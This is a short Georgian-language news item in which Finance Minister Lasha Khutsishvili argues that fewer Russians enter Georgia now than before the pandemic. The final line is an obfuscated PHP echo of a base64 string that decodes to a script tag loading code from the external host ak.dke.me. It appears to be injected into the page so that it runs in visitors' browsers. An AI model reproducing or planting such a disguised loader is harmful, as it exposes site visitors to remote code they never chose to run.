celsiusi
ავერსი შნაიდერი
ფინანსთა მინისტრის ლაშა ხუციშვილის შეფასებით, საქართველოში პანდემიამდე რუსეთის უფრო მეტი მოქალაქე შემოდიოდა.
 
მისი თქმით, აბსოლუტურად გაუგებარია ის შიში, რომელიც ამ მიმართულებით არის გამოთქმული.
 
„პირველ რიგში როდესაც ვსაუბრობთ უპრეცედენტო ზრდაზე უნდა შევხედოთ რიცხვებს და რაოდენობას. რიცხვებს თუ შევხედავთ, ეს უნდა შევადაროთ იმ პერიოდს, რომელი პერიოდიც არის შესადარისი. ვერ შევადარებთ პანდემიის პერიოდს, როდესაც საზღვრები იყო ჩაკეტილი და სასაზღვრო გამშვები პუნქტები ფაქტობრივად არ ფუნქციონირებდნენ და ვერ შეადარებთ ისეთ პერიოდს, როდესაც გარკვეული შეფერხებები არსებობდა მიმოსვლასთან დაკავშირებით. უნდა შევადაროთ ბუნებრივია პანდემიამდე პერიოდს და თუ შევადარებთ რიცხვებს, ეს არათუ გაზრდილი, არამედ განახევრებულია რაოდენობაში. შესაბამისად, აბსოლუტურად გაუგებარია ის შიში, რომელიც ამ მიმართულებით იქნა გამოთქმული. ეს ინფორმაცია არის საჯარო, ეს ინფორმაცია არის ხელმისაწვდომი და შესაბამისად, ნებისმიერ ადამიანს ინფორმაციაზე შეუძლია წვდომა ჰქონდეს, ამ ინფორმაციის ანალიზი გააკეთოს და შესაბამისად, ვერანაირ რისკებს ამ მიმართულებით ვერ ვხედავთ, რომ რაიმე ტიპის პრობლემა არსებობდეს ქვეყანაში“, - განაცხადა მინისტრმა.
587
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");